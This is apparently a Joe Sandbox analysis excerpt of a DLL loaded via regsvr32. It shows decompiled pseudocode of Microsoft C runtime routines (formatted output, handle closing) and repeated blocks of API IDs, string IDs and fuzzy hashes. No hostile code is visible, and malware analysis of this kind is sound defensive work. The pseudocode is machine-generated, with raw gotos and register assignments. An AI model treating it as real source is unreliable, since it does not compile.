                                                                                			E00007FFA7FFA5247C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                				signed int _t212;
                                                                                				signed char _t217;
                                                                                				intOrPtr _t252;
                                                                                				signed int _t327;
                                                                                				signed int _t328;
                                                                                				signed long long _t331;
                                                                                				intOrPtr* _t354;
                                                                                				signed long long _t379;
                                                                                
                                                                                				_t327 = __rax;
                                                                                				_a708 = 0x27;
                                                                                				_a72 = 0x10;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
                                                                                				_a84 = 0x30;
                                                                                				_a85 = _a708 + 0x51;
                                                                                				_a92 = 2;
                                                                                				_a72 = 8;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
                                                                                				asm("bts eax, 0x9");
                                                                                				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t327;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t327;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
                                                                                				_t328 = E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t328;
                                                                                				goto 0x5247c80e;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t328;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t328;
                                                                                				goto 0x5247c84b;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t328;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
                                                                                				if (_a824 >= 0) goto 0x5247c882;
                                                                                				_a832 =  ~_a824;
                                                                                				asm("bts eax, 0x8");
                                                                                				goto 0x5247c892;
                                                                                				_t331 = _a824;
                                                                                				_a832 = _t331;
                                                                                				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
                                                                                				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
                                                                                				_a832 = _a832 & _t331;
                                                                                				if (_a116 >= 0) goto 0x5247c8d8;
                                                                                				_a116 = 1;
                                                                                				goto 0x5247c8f5;
                                                                                				_a80 = _a80 & 0xfffffff7;
                                                                                				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
                                                                                				_a116 = 0x200;
                                                                                				if (_a832 != 0) goto 0x5247c908;
                                                                                				_a92 = 0;
                                                                                				_a64 =  &_a687;
                                                                                				_t212 = _a116;
                                                                                				_a116 = _a116 - 1;
                                                                                				if (_t212 > 0) goto 0x5247c936;
                                                                                				if (_a832 == 0) goto 0x5247c9d3;
                                                                                				_a1040 = _a72;
                                                                                				_a816 = _t212 / _a1040 + 0x30;
                                                                                				_a1048 = _a72;
                                                                                				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
                                                                                				_t217 = _a816 + _a708;
                                                                                				_a816 = _t217;
                                                                                				 *_a64 = _a816 & 0x000000ff;
                                                                                				_a64 = _a64 - 1;
                                                                                				goto 0x5247c915;
                                                                                				_a104 = _t217;
                                                                                				_a64 = _a64 + 1;
                                                                                				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
                                                                                				if (_a104 == 0) goto 0x5247ca12;
                                                                                				if ( *_a64 == 0x30) goto 0x5247ca31;
                                                                                				_a64 = _a64 - 1;
                                                                                				 *_a64 = 0x30;
                                                                                				_a104 = _a104 + 1;
                                                                                				if (_a108 != 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
                                                                                				_a84 = 0x2d;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
                                                                                				_a84 = 0x2b;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
                                                                                				_a84 = 0x20;
                                                                                				_a92 = 1;
                                                                                				_a840 = _a88 - _a104 - _a92;
                                                                                				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
                                                                                				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
                                                                                				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
                                                                                				if (_a76 == 0) goto 0x5247cc1d;
                                                                                				if (_a104 <= 0) goto 0x5247cc1d;
                                                                                				_a872 = 0;
                                                                                				_a848 = _a64;
                                                                                				_a856 = _a104;
                                                                                				_a856 = _a856 - 1;
                                                                                				if (_a856 == 0) goto 0x5247cc1b;
                                                                                				_a1056 =  *_a848 & 0x0000ffff;
                                                                                				r9d = _a1056 & 0x0000ffff;
                                                                                				r8d = 6;
                                                                                				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
                                                                                				_a848 =  &(_a848[1]);
                                                                                				if (_a872 != 0) goto 0x5247cbe5;
                                                                                				if (_a860 != 0) goto 0x5247cbf2;
                                                                                				_a688 = 0xffffffff;
                                                                                				goto 0x5247cc1b;
                                                                                				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                				goto 0x5247cb60;
                                                                                				goto 0x5247cc3b;
                                                                                				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                				if (_a688 < 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				if (_a96 == 0) goto 0x5247cc8e;
                                                                                				0x52465330();
                                                                                				_a96 = 0;
                                                                                				goto 0x5247b99c;
                                                                                				if (_a704 == 0) goto 0x5247ccb4;
                                                                                				if (_a704 == 7) goto 0x5247ccb4;
                                                                                				_a1060 = 0;
                                                                                				goto 0x5247ccbf;
                                                                                				_a1060 = 1;
                                                                                				_t252 = _a1060;
                                                                                				_a876 = _t252;
                                                                                				if (_a876 != 0) goto 0x5247cd05;
                                                                                				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                				_a32 = _t354;
                                                                                				r9d = 0;
                                                                                				r8d = 0x8f5;
                                                                                				0x5246b3b0();
                                                                                				if (_t252 != 1) goto 0x5247cd05;
                                                                                				asm("int3");
                                                                                				if (_a876 != 0) goto 0x5247cd61;
                                                                                				0x5246ab30();
                                                                                				 *_t354 = 0x16;
                                                                                				_a32 = 0;
                                                                                				r9d = 0x8f5;
                                                                                				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                				_a912 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				goto 0x5247cd80;
                                                                                				_a916 = _a688;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                			}












                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: '$0$9
                                                                                • API String ID: 1967237116-269856862
                                                                                • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                • Instruction ID: e2ffad667954e126b0ffdd340e1e5a25d65d689b8f33870ee360e5887a3f39d0
                                                                                • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                                                • Instruction Fuzzy Hash: FB41E03360DAC18BE7758B19E8813AAB7F4F786750F084125E69C86B88DBBCD545CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                                                • String ID: csm
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter$__doserrno
                                                                                • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID: (unsigned)(c + 1) <= 256$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: ("Invalid error_mode", 0)$_set_error_mode$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\errmode.c
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$string != NULL && sizeInBytes > 0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$pwcs != NULL
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (stream != NULL)$_fileno$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fileno.c
                                                                                • API String ID: 2123368286-3532421942
                                                                                • Opcode ID: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                • Instruction ID: e585d20ef95fd6f73a1fe414c12e4610a62a79febafd62119f7b9616636d9f37
                                                                                • Opcode Fuzzy Hash: 96c485b728b13626416908fd91ead62eaa4a9a456ff5e75182e25aa9e0b6060d
                                                                                • Instruction Fuzzy Hash: 5B117971A2C64A9AE7609B10E85476A73F0FB82344F489135F6AD03B99CFFDE449CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                                                • API String ID: 2123368286-152112980
                                                                                • Opcode ID: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                • Instruction ID: ac7614a9804217c120f1ab1e287f5299f05a527ab82984106693b9b960ef8ff3
                                                                                • Opcode Fuzzy Hash: 12ab011e70e09e91856032674ad216f6478f48f1fa811ad172dce2a736ade8bc
                                                                                • Instruction Fuzzy Hash: 1B11223191868299F7208B50E8043ABB6F0FB52344F988435D66C4A6E8DFFDE8898B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock$CurrentThreadValue_calloc_dbg_calloc_dbg_impl
                                                                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.c
                                                                                • API String ID: 433497747-929597301
                                                                                • Opcode ID: e98a268b298609fa8e4893618c94665bcfb429882b36b3dbb8f6c37c46338306
                                                                                • Instruction ID: 2993c23184437c9f32e4a39f2d9d46d6abc923c3cbd2958f8bbf8857d1efa8d6
                                                                                • Opcode Fuzzy Hash: e98a268b298609fa8e4893618c94665bcfb429882b36b3dbb8f6c37c46338306
                                                                                • Instruction Fuzzy Hash: A8011B21A2C68286F354DB64EC4473A66F0FB86B60F58D231E96E436DDCEACF4008A00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (count == 0) || (string != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-3131718208
                                                                                • Opcode ID: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                • Instruction ID: a55511f112abdc903afeae0ab3083cc4b69d97113dfdca2d31cd2e83a71918a3
                                                                                • Opcode Fuzzy Hash: 6707a3a661624c28ef46bf525b659d524432ea2cd8b3632390f46d17d0644e77
                                                                                • Instruction Fuzzy Hash: 33117C319086429BF7208B24E81436A26F0FB52708F588231D67C076EDDFBCE589CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: (format != NULL)$_vsnprintf_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                                                • API String ID: 2123368286-1927795013
                                                                                • Opcode ID: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                • Instruction ID: 615296af7e9b0ba0067377ee4f3fa0b94ba9a259212e6279254fe59bbdd919ea
                                                                                • Opcode Fuzzy Hash: 1d868900bb9e5cb9c38cd3d3fc38e86365b4ebb9b902cb6620b71e05e16b40fa
                                                                                • Instruction Fuzzy Hash: CD014831E1C64697F7208B24EC1076A26F0BB82344F588231E66C166EDDFFCE546CB01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _msize_dbg$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pUserData != NULL
                                                                                • API String ID: 2123368286-563024394
                                                                                • Opcode ID: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                • Instruction ID: 9fc85e2007fc42a9960705da686bbfbc5042dd8a390a354b0992d98842fbc986
                                                                                • Opcode Fuzzy Hash: 6b9fa116098faf353e1ca7c3b3c6506904e65b16bd6a9e65c326709190a7893b
                                                                                • Instruction Fuzzy Hash: 38012C31A1868697E720DB10EC5436633F0FB52364F588336D66C47AD8DFBEE5498B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: _vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL
                                                                                • API String ID: 2123368286-577066449
                                                                                • Opcode ID: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                • Instruction ID: f659aa85f39c4c495a28cd6a82850a809dd6f7604d3015db38e341cda63549da
                                                                                • Opcode Fuzzy Hash: 618b2cf93d4d6d117bb096a419223036f434eaf0351198b3217c601cf8511035
                                                                                • Instruction Fuzzy Hash: CC01B13091864696E7208B10EC903A627F0EB86754F988135E66D126ECCFFCE945CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 1646373207-1276376045
                                                                                • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                • Instruction ID: e4a80e63a0f2da88ffbeef63518588180244462d530d99e82f7d88b2bbb28a1c
                                                                                • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                • Instruction Fuzzy Hash: 9DF0AC32918A8292D625DB10F85836A7BF0FB89748F588135D69E42ABCDF7CD558CA04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 41%
                                                                                			E00007FFA7FFA52480C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
                                                                                				signed long long _v16;
                                                                                				long _v24;
                                                                                				void* _t57;
                                                                                				signed long long _t59;
                                                                                
                                                                                				_t57 = __rax;
                                                                                				_a8 = __ecx;
                                                                                				E00007FFA7FFA5247F900(_a8);
                                                                                				if (_t57 == 0xffffffff) goto 0x52480d05;
                                                                                				if (_a8 != 1) goto 0x52480cb3;
                                                                                				if (( *( *0x5248e560 + 0xb8) & 0x00000001) != 0) goto 0x52480ccc;
                                                                                				if (_a8 != 2) goto 0x52480cef;
                                                                                				_t59 =  *0x5248e560;
                                                                                				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0x52480cef;
                                                                                				E00007FFA7FFA5247F900(1);
                                                                                				_v16 = _t59;
                                                                                				E00007FFA7FFA5247F900(2);
                                                                                				if (_v16 == _t59) goto 0x52480d05;
                                                                                				E00007FFA7FFA5247F900(_a8);
                                                                                				if (CloseHandle(??) == 0) goto 0x52480d0f;
                                                                                				_v24 = 0;
                                                                                				goto 0x52480d19;
                                                                                				_v24 = GetLastError();
                                                                                				E00007FFA7FFA5247F7D0(_a8, _t59);
                                                                                				 *((char*)( *((intOrPtr*)(0x5248e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
                                                                                				if (_v24 == 0) goto 0x52480d60;
                                                                                				E00007FFA7FFA5246AA70(_v24,  *((intOrPtr*)(0x5248e560 + _t59 * 8)));
                                                                                				goto 0x52480d62;
                                                                                				return 0;
                                                                                			}








                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                                                • String ID:
                                                                                • API String ID: 1551955814-0
                                                                                • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                • Instruction ID: 07446f12e9158c8061d6d600c8db2182e6a1ff8aa61aa2fcf6e7db32a74040b4
                                                                                • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                • Instruction Fuzzy Hash: 45216031A2C68696E6649B14EC5123A77F1FB83354F1C8235E67D466EDDFADE802CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FormatLocaleThread$DateTime
                                                                                • String ID:
                                                                                • API String ID: 3587784874-0
                                                                                • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                • Instruction ID: f256fba073df8947ce29dfd7405e5f9f5422411c9e29fb085526eee9b4219521
                                                                                • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                • Instruction Fuzzy Hash: 3711C13160878086E7208F64F84015AB7E0FB4ABA4F588734EBAD57B98CF7CD1418B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 35%
